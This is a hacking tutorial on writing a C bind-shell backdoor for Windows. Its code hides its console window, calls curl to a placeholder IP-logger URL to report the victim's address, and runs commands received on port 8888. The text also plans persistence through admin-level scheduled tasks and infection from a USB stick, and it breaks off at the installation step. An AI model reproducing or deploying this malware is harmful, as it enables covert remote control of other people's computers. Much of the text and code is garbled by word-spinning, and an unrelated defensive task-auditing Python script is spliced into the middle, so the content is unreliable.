How to Program a C Backdoor (And Infect Any PC with an USB Key, and Three Seconds) - By Paid Hackers
I) INTRODUCTION
What's a backdoor?
Essentially, a backdoor is any program that lets you get remote access to your target. So it can be anything, from a basic PHP shell to an APT.
What's an APT?
APT stands for "Advanced Persistent Threat". We can see three levels of threat:
1) Basic threats like raw msfpayloads (script-kiddie level)
2) Basic developers (for instance using basic msfpayloads and a "real program" with a code template)
3) APT, which is the most advanced level.
What are we gonna do ?
We'll program a decent C backdoor. So we are between level 2 and 3. You'll need to infuse it yourself in a true blue program, or code a "real looking system".
II) GENERAL IDEA
What do we need ?
We Want a shell on a removed machine, so we can utilize it to... We can utilize it.
We likewise need it PERSISTENT.
We'll likewise need to enhance it.
Goodness, and we additionally need to backdoor any PC just by stopping a USB stick and tapping on our installer, this must take under 3 seconds
How to do it?
The C language lets you communicate over the Internet, or with local applications, using "sockets". These sockets can be bound to a specified port and used in different ways:
Sending forged packets (port scanner, DoS tool...)
Sniffing traffic (sniffers)
Client/server applications
So how do you use sockets to program a backdoor?
Well, a backdoor is a client or a server.
Bind shell backdoors are servers: they bind to a local port and wait for incoming connections to give a shell.
Reverse shell backdoors are clients: they connect to a specified IP to give a shell.
Reverse shells are widely used as they're less "suspicious".
Be that as it may, when you utilize reverse backdoorrs, you have to determine YOUR IP. Disagreeable right ? Until you've got hacked servers or open IP, this will lead any tracker to your home.
That is the reason, we'll program a tie shell secondary passage. In this way, in the event that you ensure your IP, you'll be less jeopardized.
Yet, How to join with our backdoor on the off chance that we don't realize what is its IP ? On the other hand in the event that its IP change ? That is the reason we'll additionally utilize a little hack to get the exploited person IP.
So its kinda, "hey now i've got your adress : Knock !!
Make it persistent?
You've got lots of options, but I'll keep it simple. Lots of programs that auto-execute at startup add an entry to the Windows Registry.
However, this is not enough. We need ADMIN RIGHTS. So we'll use "schtasks" with an XML file to create a task at startup that will auto-launch our backdoor with administrator rights.
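Seen from the defender's side, a startup task that runs with administrator rights leaves a recognizable Task Scheduler definition. The following is an added example, not code from the original article: it audits task XML (the format printed by `schtasks /query /xml`) for that pattern. The sample tasks, the path list and the function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
AUTOSTART = {"BootTrigger", "LogonTrigger"}
# Assumption: locations a standard user can usually write to; tune per estate.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

def audit_task(xml_text):
    """Return findings for one Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    findings = []
    triggers = root.find("t:Triggers", NS)
    kinds = {c.tag.split("}")[-1] for c in triggers} if triggers is not None else set()
    autostart = sorted(kinds & AUTOSTART)
    # RunLevel HighestAvailable means the action runs with an elevated token.
    elevated = any(
        p.findtext("t:RunLevel", "", NS) == "HighestAvailable"
        for p in root.iterfind("t:Principals/t:Principal", NS))
    if autostart and elevated:
        findings.append("elevated autostart: " + ",".join(autostart))
    for cmd in root.iterfind("t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip().strip('"')
        if autostart and path.lower().startswith(USER_WRITABLE):
            findings.append("runs from user-writable path: " + path)
    if root.findtext("t:Settings/t:Hidden", "false", NS) == "true":
        findings.append("task is hidden")
    return findings

def _task(trigger, run_level, command, hidden="false"):
    # Constructed sample, shaped like an exported task definition.
    return f"""<Task version="1.2" xmlns="{NS['t']}">
  <Triggers><{trigger}><Enabled>true</Enabled></{trigger}></Triggers>
  <Principals><Principal id="Author"><RunLevel>{run_level}</RunLevel></Principal></Principals>
  <Settings><Hidden>{hidden}</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>{command}</Command></Exec></Actions>
</Task>"""

SUSPICIOUS = _task("BootTrigger", "HighestAvailable", r"C:\Users\Public\server.exe", "true")
BENIGN = _task("CalendarTrigger", "LeastPrivilege", r"C:\Program Files\Vendor\updater.exe")

if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, audit_task(xml_text))
```

Real exports are UTF-16 encoded, so read the file as bytes and pass those to `ET.fromstring` rather than decoding them first.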
Get Victims IP ?
Truly straightforward. Our undertaking will incorporate the CURL paired in its repertory. Our code will dispatch CURL keeping in mind the end goal to interface with a removed server : An ip logging administration or a server you have.
This is a duplicate glue :
#include
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")/Winsock Library
int main(int argc, roast *argv)
{
hWnd = GetConsoleWindow();
ShowWindow(hWnd, SW_MINIMIZE);/won't conceal the window without SW_MINIMIZE
ShowWindow(hWnd, SW_HIDE);/ Hide Window
system("curl.exe http://URL_TOYOUR__IPLOGGER ");
secondary passage();
return 0;
}
int secondary passage()
{
/ Initializing vars
WSADATA wsa;
Attachment s, new_socket;
struct sockaddr_in server, customer;
int c;
roast *message, server_reply100000;
int recv_size;
printf("\nInitialising Winsock...");
on the off chance that (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
{
printf("Failed. Slip Code : %d", WSAGetLastError());
return 1;
}
printf("Initialised.\n");
/Create an attachment
on the off chance that ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
printf("Could not make attachment : %d", WSAGetLastError());
}
printf("Socket created.\n");
/Prepare the sockaddrin structure
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(8888);/PORT 8888 change it on the off chance that you need
/Bind
on the off chance that (bind(s, (struct sockaddr )&server, sizeof(server)) == SOCKET_ERROR)
{
printf("Bind fizzled with slip code : %d", WSAGetLastError());
exit(EXIT_FAILURE);
}
puts("Bind done");
/Listen to approaching associations
listen(s, 3);
/Accept and approaching association
puts("Waiting for approaching connections...");
c = sizeof(struct sockaddr_in);
Record *fp2;
burn ch;
int i = 0;
int clean_array = 0;
burn array[10000]
burn concat[11] = " > cmd.txt";
burn error_message[100] = "\n !!! WRONG COMMAND !!!" ;
burn chdir_message[100 ]= "\n Chdir to : ";
burn chdir_success[100] = "\n Chdir achievement !\n";
int ret;
int chdir_flag;
while ((new_socket = accept(s, (struct sockaddr )&client, &c)) != INVALID_SOCKET)
{
puts("Connection acknowledged");
int a = 1;
while (a == 1)
{
on the off chance that ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
{
puts("recv fizzled");
}
else
{
printf("recv size : %d\n", recv_size);
server_reply[recv_size] = '\0';
printf("INPUT : %s\n", server_reply);
chdir_flag = strcmp(server_reply, "chdir");
printf(">>> %d <<<\n", chdir_flag);
in the event that (chdirflag == 0)
{
in the event that (send(new_socket, chdir_message, strlen(chdir_message), 0) < 0)
{
puts("Send fizzled");
return 1;
}
in the event that ((recvsize = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
{
puts("recv fizzled");
}
printf("CHDIR : %d\n", recv_size);
server_reply[recv_size ]= '\0';
printf("INPUT : %s\n", server_reply);
chdir(server_reply);
printf("Chdir DONE !!!\n");
chdir_flag = 1;
in the event that (send(newsocket, chdir_success, strlen(chdir_success), 0) < 0)
{
puts("Send fizzled");
return 1;
}
}
else
{
printf("Command yield >>\n");
ret = system(server_reply);
printf("\n\n>>> %d <<<\n\n", ret);
i = 0;
in the event that (ret == 0)
{
fp2 = fopen("cmd.txt", "r");
while ((ch = fgetc(fp2)) != EOF)
{
printf("%c", ch);
arrayi = ch;
i++;
}
arrayi = '\0';
remove(fp2);
fclose(fp2);
in the event that (send(newsocket, show, strlen(array), 0) < 0)
{
puts("Send fizzled");
return 1;
}
for (i = 0; i < 10000; i++)
array[i] = '\0';
}
in the event that (ret == 1)
send(new_socket, error_message, strlen(error_message), 0);
}
}
}
in the event that (newsocket == INVALID_SOCKET)
{
printf("accept fizzled with mistake code : %d", WSAGetLastError());
return 1;
}
}
closesocket(s);
WSACleanup();
return 0;
}
END !
This is the servers/Backdoor code.
IV) INSTALL IT AND ADD SOME FUN
To begin with recovery, your past program as "server.exe" for instance.
At that point we'll utilize the following C code (to be executed with ADMIN RIGHTS)